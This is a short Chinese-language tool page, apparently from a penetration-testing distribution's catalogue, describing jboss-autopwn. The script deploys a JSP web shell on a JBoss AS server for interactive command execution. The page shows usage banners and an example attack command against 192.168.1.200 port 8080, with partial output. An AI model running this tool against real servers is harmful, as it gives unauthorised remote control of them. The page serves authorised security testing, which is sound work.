jboss-autopwn 介绍

这JBoss的脚本部署一个目标的JBoss AS服务器上的JSP shell ,一旦部署完成,该脚本用自己的上传和命令执行能力提供一个交互式会话。

其特点包括:

资料来源:https://github.com/SpiderLabs/jboss-autopwn
jboss-autopwn 首页
jboss-autopwn 源代码版本库

包含在jboss-autopwn封装工具

JBoss-win - JBoss的Windows autopwn

:~# jboss-win
[!] JBoss Windows autopwn
[!] Usage: ./e2.sh server port
[!] Christian Papathanasiou
[!] Trustwave SpiderLabs

JBoss-Linux - JBoss的*nix的autopwn

:~# jboss-linux
[!] JBoss *nix autopwn
[!] Usage: ./e.sh server port
[!] Christian Papathanasiou
[!] Trustwave SpiderLabs

jboss-autopwn 用法示例

攻击指定的端口(8080)上的目标服务器(192.168.1.200),重定向标准错误(2>/dev/null):

:~# jboss-linux 192.168.1.200 8080 2> /dev/null
[x] Retrieving cookie
[x] Now creating BSH script...
[!] Cound not create BSH script..
[x] Now deploying .war file: